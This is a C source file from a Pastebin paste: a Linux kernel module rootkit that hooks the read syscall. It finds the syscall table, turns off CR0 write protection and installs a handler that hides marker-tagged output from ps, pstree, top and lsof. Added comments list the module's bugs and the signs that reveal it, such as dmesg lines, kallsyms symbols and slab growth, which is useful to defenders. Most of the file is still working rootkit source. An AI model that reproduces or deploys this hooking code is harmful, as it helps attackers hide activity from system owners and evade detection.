read.c

Apr 4th, 2020
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.14 KB | None | 0 0
  1. #include <linux/module.h>
  2. #include <linux/slab.h>
  3. #include <linux/string.h>
  4. #include <linux/moduleparam.h>
  5. #include <linux/kernel.h>
  6. #include <linux/init.h>
  7. #include <linux/tty.h>
  8. #include <linux/unistd.h>
  9. #include <linux/syscalls.h>
  10. #include <linux/kallsyms.h>
  11. #include <linux/fdtable.h>
  12. #include <linux/set_memory.h>
  13. #include <asm/uaccess.h>
  14. #include <asm/cacheflush.h>
  15. #include <linux/sched.h>
  16. #include <linux/file.h>
  17. #include <linux/proc_fs.h>
  18. #include <asm/ptrace.h>
  19. #include "config.h"
  20.  
  21.  
  22.  
  23.  
MODULE_LICENSE("GPL");

/* Name handed to kallsyms_lookup_name() in start(). The table is looked up
 * by string because it is not an exported symbol that a module can link
 * against directly. */
char *sym_name = "sys_call_table";

/* Entry type of the syscall table for the register-based (pt_regs) x86-64
 * syscall ABI; handlers pull their arguments out of *regs. */
typedef asmlinkage long (*sys_call_ptr_t)(const struct pt_regs *);

/* Resolved at load time in start(); both start() and exit() write through it. */
static sys_call_ptr_t *sys_call_table;

/* Saved original read(2) handler, restored by exit(). Note the return type
 * (unsigned long) does not match sys_call_ptr_t (long). Non-static, so the
 * symbol shows up in the module's kallsyms entries. */
typedef asmlinkage unsigned long ( *original_read ) ( const struct pt_regs *regs );
original_read old_read;
  34.  
  35.  
  36.  
/* Writes CR0 with raw inline asm instead of the kernel's write_cr0()
 * accessor. It exists so the callers below can clear CR0.WP; NOTE(review):
 * newer kernels pin the WP bit inside native_write_cr0() and warn when it is
 * cleared, which a raw "mov ...,%cr0" sidesteps — a direct CR0 write from
 * module code is itself a strong rootkit indicator for hypervisor- or
 * hardware-level CR0 monitoring. __force_order is the kernel's dummy memory
 * operand used to sequence control-register accesses; NOTE(review): it is
 * not present on every kernel version, confirm against the build target.
 * Not static: the function is visible in /proc/kallsyms under this module. */
inline void mywrite_cr0(unsigned long cr0) {
  asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order));
}
  40.  
/* Re-sets CR0.WP (bit 16) on the current CPU after the table has been
 * patched. set_bit() only touches the local copy of the register value; the
 * hardware effect is the mywrite_cr0() call. The callers wrap this in
 * preempt_disable()/preempt_enable() so the read-modify-write stays on one
 * CPU. Not static, so it appears in the module's kallsyms symbols. */
void enable_write_protection(void) {
  unsigned long cr0 = read_cr0();
  set_bit(16, &cr0);
  mywrite_cr0(cr0);
}
  46.  
/* Clears CR0.WP (bit 16) on the current CPU so ring-0 stores to read-only
 * pages (here: the syscall table) succeed without touching page tables.
 * clear_bit() operates on the local copy; mywrite_cr0() applies it.
 * Toggling WP this way is the classic syscall-table-patching pattern and is
 * exactly what integrity checks (syscall-table hash comparisons, CR0 write
 * traps) are built to catch. Not static, so visible in kallsyms. */
void disable_write_protection(void) {
  unsigned long cr0 = read_cr0();
  clear_bit(16, &cr0);
  mywrite_cr0(cr0);
}
  52.  
  53.  
/* Replacement read(2) handler that start() installs in sys_call_table.
 *
 * What the visible code does:
 *  - regs->di / regs->si / regs->dx carry the fd / buf / count arguments of
 *    read(2) under the register-based syscall ABI. Only buf is used; fd,
 *    count and r are dead locals.
 *  - 255 bytes are copied out of the caller's buffer *before* old_read runs,
 *    so the check inspects whatever the user buffer held on entry (e.g. the
 *    previous read's data), not the bytes this call produces. The
 *    copy_from_user() result is ignored and kbuf is never NUL-terminated, so
 *    strstr() may scan past the 256-byte allocation.
 *  - If the calling task's comm contains "ps", "pstree", "top" or "lsof"
 *    (substring match, so e.g. "cupsd" or "gpsd" also qualify) and the copied
 *    bytes contain _H4X0R_ (defined in config.h, not visible here; presumably
 *    the marker being hidden), the read fails with -ENOENT instead of being
 *    forwarded.
 *  - kbuf is freed only on that -ENOENT path; every other read leaks 256
 *    bytes of kmalloc-256 — steady slab growth under read-heavy load is a
 *    usable tell for this hook.
 *  - Declared to return int while the table slot type returns long; the
 *    original handler's return value is truncated on the forward path.
 *  - Not static: "h4x_read" is visible in kallsyms, and sys_call_table's
 *    read slot pointing outside the kernel text is the direct indicator.
 *
 * Returns -ENOENT when hiding, otherwise whatever old_read() returns. */
asmlinkage int h4x_read( const struct pt_regs *regs ){
    //pr_info("inside %s\n",__func__);

    unsigned int fd = regs->di;
    //pr_info("fd %lu\n",fd);

        char *buf = (char*) regs->si;
    //pr_info("buf %p\n",buf);

    size_t count=regs->dx;
    //pr_info("regs %d\n",count); // third argument is passed into the rdx register

    int r;
    char *kbuf=(char*)kmalloc(256,GFP_KERNEL);

    /*If output is redirected to file or grep, hide it*/
    copy_from_user(kbuf,buf,255);
    //copy_to_user(buf, kbuf, sizeof(kbuf));

    if ((strstr(current->comm,"ps"))||(strstr(current->comm,"pstree"))||
            (strstr(current->comm,"top"))||(strstr(current->comm,"lsof"))){
        //pr_info("Inside current->comm, ps");
        if(strstr(kbuf,_H4X0R_)){
            //pr_info("Inside strstr(kbuf,_H4X0R_)");
            kfree(kbuf);
                return -ENOENT;
        }
    }
    //r=original_read(regs);

    return old_read(regs);

}
  87.  
  88.  
/* Module init: resolves the syscall table by name, saves the read(2) slot in
 * old_read and replaces it with h4x_read.
 *
 *  - The kallsyms_lookup_name() result is never checked. A 0 result (symbol
 *    not found, or NOTE(review): the lookup function itself no longer being
 *    available to modules on newer kernels) turns the sys_call_table[...]
 *    accesses below into a dereference through a null table pointer.
 *  - preempt_disable() only keeps this task on one CPU so the CR0.WP clear
 *    and the table store happen on the same CPU; it is not a lock. Other
 *    CPUs keep dispatching syscalls through the table while it is patched.
 *  - Every step is logged with pr_info(), including kernel pointers via %p.
 *    The "Inside start", "sys_call_table", "old_read contains" and "Disable
 *    page Write protection" lines in dmesg are a ready-made load indicator.
 *  - Returns 0 unconditionally, so the module stays resident even when the
 *    lookup failed. */
static int __init start(void)
{
    pr_info("Inside %s\n",__func__);

    sys_call_table = (sys_call_ptr_t *)kallsyms_lookup_name(sym_name);
    pr_info("sys_call_table %p\n",sys_call_table);

    old_read = (original_read)sys_call_table[__NR_read];
    pr_info("old_read contains %p\n",old_read);

    preempt_disable(); // pins this task to the current CPU; not a lock against other CPUs
    disable_write_protection();

    pr_info("Disable page Write protection and locking \n");

    // Both works
    //sys_call_table[__NR_read] = (sys_call_ptr_t)&hacked_read_test;
    sys_call_table[__NR_read] = (sys_call_ptr_t)h4x_read;
    pr_info("sys_call_table[__NR_read] contains %p \n", sys_call_table[__NR_read]);

    enable_write_protection();
    preempt_enable();
    pr_info("Enable page Write protection and locking \n");


  return 0;
}
  116.  
  117.  
/* Module exit (rmmod): puts the saved read(2) handler back using the same
 * preempt_disable / WP-clear sequence as start().
 *  - Named `exit` and not static, so a global symbol of that name is emitted
 *    by the module and is visible in /proc/kallsyms.
 *  - NOTE(review): nothing here waits for h4x_read calls in flight on other
 *    CPUs before the module text goes away; a task mid-hook at unload time
 *    would return into unmapped module memory. Confirm whether the kernel's
 *    unload path provides any grace period for this case.
 *  - Logs "Cleaning up syscall hook." to dmesg — the matching unload tell. */
void __exit exit(void)
{
    pr_info("Inside %s\n",__func__);
    printk(KERN_INFO "Cleaning up syscall hook.\n");

    preempt_disable();
    disable_write_protection();

    sys_call_table[__NR_read] = (sys_call_ptr_t)old_read;

    enable_write_protection();
    preempt_enable();

}
  133.  
/* Register start()/exit() as the module's load and unload entry points. */
module_init(start);
module_exit(exit);